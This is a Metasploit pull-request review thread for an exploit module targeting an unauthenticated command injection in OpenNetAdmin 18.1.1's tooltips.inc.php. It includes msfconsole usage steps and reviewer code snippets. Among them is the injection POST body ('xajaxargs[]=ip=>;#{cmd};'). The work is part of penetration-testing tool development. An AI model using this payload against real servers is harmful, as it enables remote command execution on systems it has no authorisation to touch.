OpenNetAdmin 18.1.1
rapid7/metasploit-framework pull request #12704
Opened 2019-12-11 18:12 UTC by onurer

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
This module exploits a command injection in OpenNetAdmin.

## Verification

Launch metasploit and set the appropiate options:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/opennetadmin_ping_cmd_injection`
- [ ]  `set RHOSTS <rhosts>`
- [ ]  `set LHOST <lhost>`
- [ ]  `set VHOST <hostname>`
- [ ]  `exploit`

2019-12-12 15:15 UTC, acammack-r7 commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    cmd.gsub!(/chmod \+x/, 'chmod 777')
Would this make more sense as:
```suggestion
    CGI.escape cmd
```
to catch all the characters?

2019-12-12 15:19 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    cmd.gsub!(/chmod \+x/, 'chmod 777')
Is there a reason to use `data` rather than `vars_post` (which would automatically take care of URL encoding) ?

2019-12-12 15:22 UTC, bcoles commented
There's inconsistency with the naming convention here.

* documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md 
* modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb 
* `'Platform'        => 'linux',`

It looks like OpenNetAdmin is a typical LAMP stack style application, which should run on any UNIX system.

* https://github.com/opennetadmin
* https://github.com/opennetadmin/ona/wiki/Install

In which case the module belongs in `modules/exploits/unix/webapp`.

2019-12-13 11:19 UTC, onurer commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    cmd.gsub!(/chmod \+x/, 'chmod 777')
```
    vars_post = {
          'xajax'          => 'window_submit',
          'xajaxargs[]' => 'tooltips',
          'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
          'xajaxargs[]' => 'ping'
        }
```
`warning: key "xajaxargs[]" is duplicated and overwritten`

I am encountering the above error.
@bcoles

2019-12-13 17:20 UTC, acammack-r7 commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    cmd.gsub!(/chmod \+x/, 'chmod 777')
Unfortunately I don't see a way to handle the repeated key query string paradigm in Rex (PHP will turn it into an array). I'm fine passing as a string (with the payload properly encoded), or you can add array handling to https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L146. Instead of doing a `val.to_s` right away, when `val` is an array I would do something like:
```ruby
val.each do |v|
  v = v.to_s
  pstr << '&' if pstr.length > 0
  pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
  pstr << '='
  pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
end
```

Then you could pass the post data like:
```ruby
    vars_post = {
          'xajax'          => 'window_submit',
          'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
        }
```

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    CGI.escape cmd
This method performs encoding. The method name `filter_bad_chars` does not match the purpose of this method. Also, abstracting this away into a method isn't necessary.

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +class MetasploitModule < Msf::Exploit::Remote
Please add comment header:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    version = Gem::Version.new('opennetadmin_version')
It is unlikely that this works as intended, as the version is parsed as a string.

```suggestion
    version = Gem::Version.new(opennetadmin_version)
```

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    execute_cmdstager(flavor: :printf)
If the command stager cannot be changed, the option should be deregistered in the module info Hash.

```ruby
deregister_options('CMDSTAGER::FLAVOR')
```

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
Given that you're using `>=` and `<=`, this could be refactored to use `.between?` (which is an inclusive match).

```suggestion
    if version.between?(Gem::Version.new('8.5.14'), Gem::Version.new('18.1.1'))
```

2019-12-14 07:59 UTC, bcoles commented on documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
> +## Verification
Please move the `Verification` section after the `Description` and `Vulnerable Application` sections, for consistency with existing documentation.

2019-12-14 07:59 UTC, bcoles commented on modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb
> +          'mattpascoe', # Vulnerability discovery
```suggestion
          'mattpascoe', # Vulnerability discovery and exploit
```

2019-12-14 07:59 UTC, bcoles commented on documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
> +This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the tooltips.inc.php component, due to the insecure usage of the shell_exec() php function.
```suggestion
This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.
```

2020-02-20 12:12 UTC, cdelafuente-r7 requested changes
Thanks for your contribution! I just have a few comments and questions before it lands.

2020-02-20 12:12 UTC, cdelafuente-r7 commented on modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
> +      return CheckCode::Unknown
Not a blocker, but you also have the option to pass the error message to `CheckCode::Unknown` instead of calling `vprint_error`. I'll leave it up to you.

```suggestion
      return CheckCode::Unknown 'Connection failed'
```

2020-02-20 12:12 UTC, cdelafuente-r7 commented on modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
> +    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{CGI.escape(cmd)};&xajaxargs[]=ping"
Since https://github.com/rapid7/metasploit-framework/pull/12733 has been merged, do you want to refactor this and use `vars_post` with repeated keys?
I'm also fine with the current implementation, it's up to you.

2020-02-21 14:30 UTC, cdelafuente-r7 approved these changes

2020-02-21 14:50 UTC, merged

2020-02-21 14:52 UTC, cdelafuente-r7 commented
@onurer, thanks again for this contribution! I just pushed a last commit to fix an indentation issue. Not a big deal.

2020-02-21 15:10 UTC, cdelafuente-r7 commented
# Release Notes
This module allow you to exploit a command injection vulnerability in OpenNetAdmin 18.1.1, a network management application for managing IP subnets, and remotely execute commands. You don’t need to authenticate to exploit this vulnerability.